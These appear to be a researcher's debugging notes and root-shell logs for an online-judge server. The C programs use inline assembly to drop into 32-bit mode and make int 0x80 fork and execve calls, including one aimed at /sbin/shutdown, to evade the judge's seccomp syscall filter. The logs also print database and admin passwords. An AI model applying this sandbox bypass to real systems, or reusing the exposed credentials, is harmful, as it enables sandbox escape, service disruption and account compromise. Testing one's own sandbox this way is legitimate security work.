/bin/mv /home/judge/run1000//* /home/judge/run1000//log/ 2>/dev/null
result=10
root@ubuntu:/home/judge/run1000/log# ./Main 
:Beta~
parent
child
child
child
Segmentation fault (core dumped)
root@ubuntu:/home/judge/run1000/log# 

fork - wrong answer.

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>
 
char *args[]={
    "Main",
    0
};
 
static int __attribute__((used)) stk[100];
 
__attribute__((naked)) int my_fork(){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"

    "call 0f\n\t"

    "mov $2, %eax\n\t"
    "int $0x80\n\t"

    "call 1f\n\t"
    "movq 8(%rbp), %rbx\n\t"
    "movq %rbx, (%rsp)\n\t"
    "ret\n\t"
 
    "0:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"

    "1:\n\t"
    "movl $0x33, 4(%rsp)\n\t"
    "retf\n\t"
    );
}
 
int main()
{
    printf(":Beta~\n");

    int pid = my_fork();
    
    if (pid){
        printf("my exe cout >> pid: %d\n", pid);
    }
    else{
        printf("my exe cout >> pid: %d\n", pid);
    }
    
    return 0;
}
root@ubuntu:/home/judge/run1000/log# judge_client 1038 1000 /home/judge debug
OJ_HOST_NAME=127.0.0.1
OJ_USER_NAME=debian-sys-maint
OJ_PASSWORD=byIOjjezfldhgnMB
OJ_DB_NAME=jol
OJ_PORT_NUMBER=3306
OJ_JAVA_TIME_BONUS=2
OJ_JAVA_MEMORY_BONUS=64
OJ_JAVA_XMS=-Xms64M
OJ_JAVA_XMX=-Xmx128M
OJ_SIM_ENABLE=0
OJ_HTTP_JUDGE=0
OJ_HTTP_BASEURL=http://127.0.0.1/JudgeOnline
OJ_HTTP_USERNAME=admin
OJ_HTTP_PASSWORD=admin
OJ_HTTP_DOWNLOAD=1
OJ_OI_MODE=1
OJ_SHM_RUN=0
OJ_USE_MAX_TIME=0
OJ_TIME_LIMIT_TO_TOTAL=0
OJ_COMPILE_CHROOT=0
OJ_TURBO_MODE=0
OJ_CPU_COMPENSATION=0.92
OJ_PYTHON_FREE=0
mkdir /home/judge/run1000/
mkdir: cannot create directory ‘/home/judge/run1000/’: File exists
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/rm -rf /home/judge/run1000//log/* 2>/dev/null
mkdir /home/judge/run1000//log/ 2>/dev/null
/bin/mv /home/judge/run1000//* /home/judge/run1000//log/ 2>/dev/null
cid:0
Main=chown judge /home/judge/run1000//Main.c
time: 1 mem: 128
[iyzyi compile]****************
[iyzyi pid] 65689****************
[iyzyi pid] 0****************
/bin/chown judge /home/judge/run1000/ 
/bin/chmod 750 /home/judge/run1000/ 
[iyzyi compile_chroot] 0****************
status=0
/bin/umount -f bin usr lib lib64 etc/alternatives proc dev 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/cp '/home/judge/data/1000/test.in' /home/judge/run1000//data.in
/bin/cp /home/judge/data/1000/*.dic /home/judge/run1000// 2>/dev/null
init_call_counter:0
SYS_execve:59
pid=65751 judging /home/judge/data/1000/test.in
[iyzyi exitcode] 5****************
[iyzyi] call_counter[59] : 0
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -4
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -5
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -6
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -7
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -8
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -9
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[231] : -2
[iyzyi exitcode] 5****************
[iyzyi] call_counter[231] : -3
/1000/test.in: mem=1073152 time=0
time:0/0
echo '========[test.out]========='>>diff.out
echo 'Expected                              |    Yours'>>diff.out
diff '/home/judge/data/1000/test.out' user.out -y|head -100>>diff.out
echo '
=============================='>>diff.out
fail test /home/judge/data/1000/test.in
/bin/cp '/home/judge/data/1000/sample.in' /home/judge/run1000//data.in
/bin/cp /home/judge/data/1000/*.dic /home/judge/run1000// 2>/dev/null
init_call_counter:0
SYS_execve:59
pid=65762 judging /home/judge/data/1000/sample.in
[iyzyi exitcode] 5****************
[iyzyi] call_counter[59] : 0
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -4
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -5
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -6
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -7
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -8
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -9
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[231] : -2
[iyzyi exitcode] 5****************
[iyzyi] call_counter[231] : -3
/1000/sample.in: mem=1073152 time=0
time:0/0
echo '========[sample.out]========='>>diff.out
echo 'Expected                              |    Yours'>>diff.out
diff '/home/judge/data/1000/sample.out' user.out -y|head -100>>diff.out
echo '
=============================='>>diff.out
fail test /home/judge/data/1000/sample.in
use total time:0
[iyzyi oi_mode] 1****************
ACflg:4
finalACflg:6
sql:[UPDATE `problem` SET `accepted`=(SELECT count(*) FROM `solution` WHERE `problem_id`=1000 AND `result`=4) WHERE `problem_id`=1000]
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/rm -rf /home/judge/run1000//log/* 2>/dev/null
mkdir /home/judge/run1000//log/ 2>/dev/null
/bin/mv /home/judge/run1000//* /home/judge/run1000//log/ 2>/dev/null
result=6
root@ubuntu:/home/judge/run1000/log# 
root@ubuntu:/home/judge/run1000/log# cat diff.out 
========[test.out]=========
Expected                              |    Yours
A                                  \    :Beta~
                                  >    my exe cout >> pid: -11
                                  >    my exe cout >> pid: 0

==============================
========[sample.out]=========
Expected                              |    Yours
A                                  \    :Beta~
                                  >    my exe cout >> pid: -11
                                  >    my exe cout >> pid: 0

==============================
time_space_table:
/1000/test.in:WA mem=1048k time=0ms
/1000/sample.in:WA mem=1048k time=0ms

root@ubuntu:/home/judge/run1000/log# 

image-20201121023419980

execve - wrong answer

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>
 
char *args[]={
    "/sbin/shutdown",
    0
};
 
static int __attribute__((used)) stk[100];
 
__attribute__((naked)) int my_execve(char * a,char** b,char** c){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"

    "call 0f\n\t"

    "mov $11, %eax\n\t"
    "mov %edi, %ebx\n\t"
    "mov %esi, %ecx\n\t"
    "mov %edx, %edx\n\t"
    "int $0x80\n\t"

    "call 1f\n\t"
    "movq 8(%rbp), %rbx\n\t"
    "movq %rbp, %rsp\n\t"
    "movq %rbx, (%rsp)\n\t"
    "ret\n\t"
 
    "0:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"

    "1:\n\t"
    "movl $0x33, 4(%rsp)\n\t"
    "retf\n\t"
    );
}
 
int main()
{
    printf(":Beta~\n");

    my_execve(args[0],args,0);
    
    return 0;
}
root@ubuntu:/home/judge/run1000/log# judge_client 1063 1000 /home/judge debug 
OJ_HOST_NAME=127.0.0.1
OJ_USER_NAME=debian-sys-maint
OJ_PASSWORD=byIOjjezfldhgnMB
OJ_DB_NAME=jol
OJ_PORT_NUMBER=3306
OJ_JAVA_TIME_BONUS=2
OJ_JAVA_MEMORY_BONUS=64
OJ_JAVA_XMS=-Xms64M
OJ_JAVA_XMX=-Xmx128M
OJ_SIM_ENABLE=0
OJ_HTTP_JUDGE=0
OJ_HTTP_BASEURL=http://127.0.0.1/JudgeOnline
OJ_HTTP_USERNAME=admin
OJ_HTTP_PASSWORD=admin
OJ_HTTP_DOWNLOAD=1
OJ_OI_MODE=1
OJ_SHM_RUN=0
OJ_USE_MAX_TIME=0
OJ_TIME_LIMIT_TO_TOTAL=0
OJ_COMPILE_CHROOT=0
OJ_TURBO_MODE=0
OJ_CPU_COMPENSATION=0.92
OJ_PYTHON_FREE=0
mkdir /home/judge/run1000/
mkdir: cannot create directory ‘/home/judge/run1000/’: File exists
/bin/rm -rf /home/judge/run1000//log/* 2>/dev/null
mkdir /home/judge/run1000//log/ 2>/dev/null
/bin/mv /home/judge/run1000//* /home/judge/run1000//log/ 2>/dev/null
cid:0
Main=chown judge /home/judge/run1000//Main.c
time: 1 mem: 128
[iyzyi compile]****************
[iyzyi pid] 75146****************
[iyzyi pid] 0****************
/bin/chown judge /home/judge/run1000/ 
/bin/chmod 750 /home/judge/run1000/ 
[iyzyi compile_chroot] 0****************
status=0
/bin/cp '/home/judge/data/1000/test.in' /home/judge/run1000//data.in
/bin/cp /home/judge/data/1000/*.dic /home/judge/run1000// 2>/dev/null
init_call_counter:0
SYS_execve:59
pid=75160 judging /home/judge/data/1000/test.in
[iyzyi exitcode] 5****************
[iyzyi] call_counter[59] : 0
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -4
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -5
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -6
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -7
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -8
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -9
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[11] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[11] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[231] : -2
[iyzyi exitcode] 5****************
[iyzyi] call_counter[231] : -3
/1000/test.in: mem=1073152 time=0
time:0/0
echo '========[test.out]========='>>diff.out
echo 'Expected                              |    Yours'>>diff.out
diff '/home/judge/data/1000/test.out' user.out -y|head -100>>diff.out
echo '
=============================='>>diff.out
fail test /home/judge/data/1000/test.in
/bin/cp '/home/judge/data/1000/sample.in' /home/judge/run1000//data.in
/bin/cp /home/judge/data/1000/*.dic /home/judge/run1000// 2>/dev/null
init_call_counter:0
SYS_execve:59
pid=75171 judging /home/judge/data/1000/sample.in
[iyzyi exitcode] 5****************
[iyzyi] call_counter[59] : 0
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -4
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -5
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -6
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -7
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -8
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -9
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[11] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[11] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[231] : -2
[iyzyi exitcode] 5****************
[iyzyi] call_counter[231] : -3
/1000/sample.in: mem=1073152 time=0
time:0/0
echo '========[sample.out]========='>>diff.out
echo 'Expected                              |    Yours'>>diff.out
diff '/home/judge/data/1000/sample.out' user.out -y|head -100>>diff.out
echo '
=============================='>>diff.out
fail test /home/judge/data/1000/sample.in
use total time:0
[iyzyi oi_mode] 1****************
ACflg:4
finalACflg:6
sql:[UPDATE `problem` SET `accepted`=(SELECT count(*) FROM `solution` WHERE `problem_id`=1000 AND `result`=4) WHERE `problem_id`=1000]
/bin/rm -rf /home/judge/run1000//log/* 2>/dev/null
mkdir /home/judge/run1000//log/ 2>/dev/null
/bin/mv /home/judge/run1000//* /home/judge/run1000//log/ 2>/dev/null
result=6
root@ubuntu:/home/judge/run1000/log# cat diff.out 
========[test.out]=========
Expected                              |    Yours
A                                  \    :Beta~

==============================
========[sample.out]=========
Expected                              |    Yours
A                                  \    :Beta~

==============================
time_space_table:
/1000/test.in:WA mem=1048k time=0ms
/1000/sample.in:WA mem=1048k time=0ms

root@ubuntu:/home/judge/run1000/log# 

fork 修复,前面的不对 wronganswer

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>
 
char *args[]={
    "Main",
    0
};
 
static int __attribute__((used)) stk[100];
 
__attribute__((naked)) int my_fork(){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"           // 找一处可写的空间作为x86的栈

    "movq %rbp, %rdi\n\t"           //利用rdi保存下x64的栈的rbp,等下运行完int80后还要转回x64
    //"movq %rbx, 8(%rsp)\n\t"

    "call 0f\n\t"                   // 转x86

    "mov $2, %eax\n\t"
    "int $0x80\n\t"                 // fork


    "call 1f\n\t"                   // 转回x64
    
    "movq %rdi, %rsp\n\t"           // 恢复回x64的栈
    "pop %rbp\n\t"                  // 弹出旧的rbp
    "ret\n\t"                       // 返回到main中的某一位置处继续执行
 


    "0:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"

    "1:\n\t"
    "movl $0x33, 4(%rsp)\n\t"
    "retf\n\t"
    );
}
 
int main()
{
    printf(":Beta~\n");

    int pid = my_fork();
    
    if (pid){
        printf("1 my exe cout >> pid: %d\n", pid);
    }
    else{
        printf("2 my exe cout >> pid: %d\n", pid);
    }
    
    return 0;
}
root@ubuntu:/home/judge/run1000/log# judge_client 1044 1000 /home/judge debug
OJ_HOST_NAME=127.0.0.1
OJ_USER_NAME=debian-sys-maint
OJ_PASSWORD=byIOjjezfldhgnMB
OJ_DB_NAME=jol
OJ_PORT_NUMBER=3306
OJ_JAVA_TIME_BONUS=2
OJ_JAVA_MEMORY_BONUS=64
OJ_JAVA_XMS=-Xms64M
OJ_JAVA_XMX=-Xmx128M
OJ_SIM_ENABLE=0
OJ_HTTP_JUDGE=0
OJ_HTTP_BASEURL=http://127.0.0.1/JudgeOnline
OJ_HTTP_USERNAME=admin
OJ_HTTP_PASSWORD=admin
OJ_HTTP_DOWNLOAD=1
OJ_OI_MODE=1
OJ_SHM_RUN=0
OJ_USE_MAX_TIME=0
OJ_TIME_LIMIT_TO_TOTAL=0
OJ_COMPILE_CHROOT=0
OJ_TURBO_MODE=0
OJ_CPU_COMPENSATION=0.92
OJ_PYTHON_FREE=0
mkdir /home/judge/run1000/
mkdir: cannot create directory ‘/home/judge/run1000/’: File exists
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/rm -rf /home/judge/run1000//log/* 2>/dev/null
mkdir /home/judge/run1000//log/ 2>/dev/null
/bin/mv /home/judge/run1000//* /home/judge/run1000//log/ 2>/dev/null
cid:0
Main=chown judge /home/judge/run1000//Main.c
time: 1 mem: 128
[iyzyi compile]****************
[iyzyi pid] 65037****************
[iyzyi pid] 0****************
/bin/chown judge /home/judge/run1000/ 
/bin/chmod 750 /home/judge/run1000/ 
[iyzyi compile_chroot] 0****************
status=0
/bin/umount -f bin usr lib lib64 etc/alternatives proc dev 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/cp '/home/judge/data/1000/test.in' /home/judge/run1000//data.in
/bin/cp /home/judge/data/1000/*.dic /home/judge/run1000// 2>/dev/null
init_call_counter:0
SYS_execve:59
pid=65098 judging /home/judge/data/1000/test.in
[iyzyi exitcode] 5****************
[iyzyi] call_counter[59] : 0
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -4
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -5
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -6
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -7
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -8
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -9
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[231] : -2
[iyzyi exitcode] 5****************
[iyzyi] call_counter[231] : -3
/1000/test.in: mem=1073152 time=0
time:0/0
echo '========[test.out]========='>>diff.out
echo 'Expected                              |    Yours'>>diff.out
diff '/home/judge/data/1000/test.out' user.out -y|head -100>>diff.out
echo '
=============================='>>diff.out
fail test /home/judge/data/1000/test.in
/bin/cp '/home/judge/data/1000/sample.in' /home/judge/run1000//data.in
/bin/cp /home/judge/data/1000/*.dic /home/judge/run1000// 2>/dev/null
init_call_counter:0
SYS_execve:59
pid=65109 judging /home/judge/data/1000/sample.in
[iyzyi exitcode] 5****************
[iyzyi] call_counter[59] : 0
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -4
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -5
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -6
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -7
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -8
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -9
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[1] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[231] : -2
[iyzyi exitcode] 5****************
[iyzyi] call_counter[231] : -3
/1000/sample.in: mem=1073152 time=0
time:0/0
echo '========[sample.out]========='>>diff.out
echo 'Expected                              |    Yours'>>diff.out
diff '/home/judge/data/1000/sample.out' user.out -y|head -100>>diff.out
echo '
=============================='>>diff.out
fail test /home/judge/data/1000/sample.in
use total time:0
[iyzyi oi_mode] 1****************
ACflg:4
finalACflg:6
sql:[UPDATE `problem` SET `accepted`=(SELECT count(*) FROM `solution` WHERE `problem_id`=1000 AND `result`=4) WHERE `problem_id`=1000]
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/rm -rf /home/judge/run1000//log/* 2>/dev/null
mkdir /home/judge/run1000//log/ 2>/dev/null
/bin/mv /home/judge/run1000//* /home/judge/run1000//log/ 2>/dev/null
result=6
root@ubuntu:/home/judge/run1000/log# 

image-20201121170635279

为啥会弹shell我也没搞懂。。。

fork 再次修复fork (WA)

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>
 
char *args[]={
    "Main",
    0
};
 
static int __attribute__((used)) stk[100];
 
__attribute__((naked)) int my_fork(){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"           // 找一处可写的空间作为x86的栈

    "movq %rbp, 12(%rsp)\n\t"           //1: 保存下x64的栈的rbp,等下运行完int80后还要转回x64

    "call 0f\n\t"                   // 转x86

    "mov $2, %eax\n\t"
    "int $0x80\n\t"                 // fork


    "call 1f\n\t"                   // 转回x64
    
    "pop %rbp\n\t"            // 需要调整一个offset=8,所以pop一次
    "pop %rsp\n\t"            // 对应1: 恢复回x64的栈
    "pop %rbp\n\t"                  // 弹出旧的rbp
